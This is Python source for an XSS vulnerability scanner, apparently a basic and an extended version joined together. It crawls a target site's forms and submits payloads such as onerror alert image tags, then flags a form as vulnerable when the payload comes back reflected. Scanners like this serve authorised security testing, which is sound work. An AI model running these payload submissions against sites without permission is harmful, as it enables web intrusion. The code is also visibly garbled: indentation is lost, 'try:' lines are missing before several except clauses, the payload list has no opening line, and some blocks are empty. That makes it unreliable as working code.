import requests
from pprint import pprint
from bs4 import BeautifulSoup as bs
from urllib.parse import urljoin
def get_all_forms(url):
"""Given a `url`, it returns all forms from the HTML content"""
soup = bs(requests.get(url).content, "html.parser")
return soup.find_all("form")
def get_form_details(form):
This function extracts all possible useful information about an HTML `form`
details = {}
# get the form action (target url)
action = form.attrs.get("action", "").lower()
# get the form method (POST, GET, etc.)
method = form.attrs.get("method", "get").lower()
# get all the input details such as type and name
inputs = []
for input_tag in form.find_all("input"):
input_type = input_tag.attrs.get("type", "text")
input_name = input_tag.attrs.get("name")
inputs.append({"type": input_type, "name": input_name})
# put everything to the resulting dictionary
details["action"] = action
details["method"] = method
details["inputs"] = inputs
return details
def submit_form(form_details, url, value):
Submits a form given in `form_details`
form_details (list): a dictionary that contain form information
url (str): the original URL that contain that form
value (str): this will be replaced to all text and search inputs
Returns the HTTP Response after form submission
# construct the full URL (if the url provided in action is relative)
target_url = urljoin(url, form_details["action"])
# get the inputs
inputs = form_details["inputs"]
data = {}
for input in inputs:
# replace all text and search values with `value`
if input["type"] == "text" or input["type"] == "search":
input["value"] = value
input_name = input.get("name")
input_value = input.get("value")
if input_name and input_value:
# if input name and value are not None,
# then add them to the data of form submission
data[input_name] = input_value
print(f"[+] Submitting malicious payload to {target_url}")
print(f"[+] Data: {data}")
if form_details["method"] == "post":
return requests.post(target_url, data=data)
# GET request
return requests.get(target_url, params=data)
def scan_xss(url):
Given a `url`, it prints all XSS vulnerable forms and
returns True if any is vulnerable, False otherwise
# get all the forms from the URL
forms = get_all_forms(url)
print(f"[+] Detected {len(forms)} forms on {url}.")
js_script = "<Script>alert('hi')</scripT>"
# returning value
is_vulnerable = False
# iterate over all forms
for form in forms:
form_details = get_form_details(form)
content = submit_form(form_details, url, js_script).content.decode()
if js_script in content:
print(f"[+] XSS Detected on {url}")
print(f"[*] Form details:")
is_vulnerable = True
# won't break because we want to print other available vulnerable forms
return is_vulnerable
if __name__ == "__main__":
import sys
url = sys.argv[1]
import requests # Importing requests library for making HTTP requests
from pprint import pprint # Importing pprint for pretty-printing data structures
from bs4 import BeautifulSoup as bs # Importing BeautifulSoup for HTML parsing
from urllib.parse import urljoin, urlparse # Importing utilities for URL manipulation
from urllib.robotparser import RobotFileParser # Importing RobotFileParser for parsing robots.txt files
from colorama import Fore, Style # Importing colorama for colored terminal output
import argparse # Importing argparse for command-line argument parsing
# List of XSS payloads to test forms with
'<img src=x onerror=alert(1)>',
'"><img src=x onerror=alert(1)>',
'\'><img src=x onerror=alert(1)>',
# global variable to store all crawled links
crawled_links = set()
def print_crawled_links():
Print all crawled links
print(f"\n[+] Links crawled:")
for link in crawled_links:
print(f" {link}")
# Function to get all forms from a given URL
def get_all_forms(url):
"""Given a `url`, it returns all forms from the HTML content"""
# Using BeautifulSoup to parse HTML content of the URL
soup = bs(requests.get(url).content, "html.parser")
# Finding all form elements in the HTML
return soup.find_all("form")
except requests.exceptions.RequestException as e:
# Handling exceptions if there's an error in retrieving forms
print(f"[-] Error retrieving forms from {url}: {e}")
return []
# Function to extract details of a form
def get_form_details(form):
This function extracts all possible useful information about an HTML `form`
details = {}
# Extracting form action and method
action = form.attrs.get("action", "").lower()
method = form.attrs.get("method", "get").lower()
inputs = []
# Extracting input details within the form
for input_tag in form.find_all("input"):
input_type = input_tag.attrs.get("type", "text")
input_name = input_tag.attrs.get("name")
inputs.append({"type": input_type, "name": input_name})
# Storing form details in a dictionary
details["action"] = action
details["method"] = method
details["inputs"] = inputs
return details
# Function to submit a form with a specific value
def submit_form(form_details, url, value):
Submits a form given in `form_details`
form_details (list): a dictionary that contains form information
url (str): the original URL that contains that form
value (str): this will be replaced for all text and search inputs
Returns the HTTP Response after form submission
target_url = urljoin(url, form_details["action"]) # Constructing the absolute form action URL
inputs = form_details["inputs"]
data = {}
# Filling form inputs with the provided value
for input in inputs:
if input["type"] == "text" or input["type"] == "search":
input["value"] = value
input_name = input.get("name")
input_value = input.get("value")
if input_name and input_value:
data[input_name] = input_value
# Making the HTTP request based on the form method (POST or GET)
if form_details["method"] == "post":
return requests.post(target_url, data=data)
return requests.get(target_url, params=data)
except requests.exceptions.RequestException as e:
# Handling exceptions if there's an error in form submission
print(f"[-] Error submitting form to {target_url}: {e}")
return None
def get_all_links(url):
Given a `url`, it returns all links from the HTML content
# Using BeautifulSoup to parse HTML content of the URL
soup = bs(requests.get(url).content, "html.parser")
# Finding all anchor elements in the HTML
return [urljoin(url, link.get("href")) for link in soup.find_all("a")]
except requests.exceptions.RequestException as e:
# Handling exceptions if there's an error in retrieving links
print(f"[-] Error retrieving links from {url}: {e}")
return []
# Function to scan for XSS vulnerabilities
def scan_xss(args, scanned_urls=None):
"""Given a `url`, it prints all XSS vulnerable forms and
returns True if any is vulnerable, None if already scanned, False otherwise"""
global crawled_links
if scanned_urls is None:
scanned_urls = set()
# Checking if the URL is already scanned
if args.url in scanned_urls:
# Adding the URL to the scanned URLs set
# Getting all forms from the given URL
forms = get_all_forms(args.url)
print(f"\n[+] Detected {len(forms)} forms on {args.url}")
# Parsing the URL to get the domain
parsed_url = urlparse(args.url)
domain = f"{parsed_url.scheme}://{parsed_url.netloc}"
if args.obey_robots:
robot_parser = RobotFileParser()
robot_parser.set_url(urljoin(domain, "/robots.txt"))
except Exception as e:
# Handling exceptions if there's an error in reading robots.txt
print(f"[-] Error reading robots.txt file for {domain}: {e}")
crawl_allowed = False
crawl_allowed = robot_parser.can_fetch("*", args.url)
crawl_allowed = True
if crawl_allowed or parsed_url.path:
for form in forms:
form_details = get_form_details(form)
form_vulnerable = False
# Testing each form with XSS payloads
for payload in XSS_PAYLOADS:
response = submit_form(form_details, args.url, payload)
if response and payload in response.content.decode():
print(f"\n{Fore.GREEN}[+] XSS Vulnerability Detected on {args.url}{Style.RESET_ALL}")
print(f"[*] Form Details:")
print(f"{Fore.YELLOW}[*] Payload: {payload} {Style.RESET_ALL}")
# save to a file if output file is provided
if args.output:
with open(args.output, "a") as f:
f.write(f"URL: {args.url}\n")
f.write(f"Form Details: {form_details}\n")
f.write(f"Payload: {payload}\n")
f.write("-"*50 + "\n\n")
form_vulnerable = True
break # No need to try other payloads for this endpoint
if not form_vulnerable:
print(f"{Fore.MAGENTA}[-] No XSS vulnerability found on {args.url}{Style.RESET_ALL}")
# Crawl links if the option is enabled
if args.crawl:
print(f"\n[+] Crawling links from {args.url}")
# Crawling links from the given URL
links = get_all_links(args.url)
except requests.exceptions.RequestException as e:
# Handling exceptions if there's an error in crawling links
print(f"[-] Error crawling links from {args.url}: {e}")
links = []
for link in set(links): # Removing duplicates
if link.startswith(domain):
if args.max_links and len(crawled_links) >= args.max_links:
print(f"{Fore.CYAN}[-] Maximum links ({args.max_links}) limit reached. Exiting...{Style.RESET_ALL}")
# Recursively scanning XSS vulnerabilities for crawled links
args.url = link
link_vulnerable = scan_xss(args, scanned_urls)
if not link_vulnerable:
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Extended XSS Vulnerability scanner script.")
parser.add_argument("url", help="URL to scan for XSS vulnerabilities")
parser.add_argument("-c", "--crawl", action="store_true", help="Crawl links from the given URL")
# max visited links
parser.add_argument("-m", "--max-links", type=int, default=0, help="Maximum number of links to visit. Default 0, which means no limit.")
parser.add_argument("--obey-robots", action="store_true", help="Obey robots.txt rules")
parser.add_argument("-o", "--output", help="Output file to save the results")
args = parser.parse_args()
scan_xss(args) # Initiating XSS vulnerability scan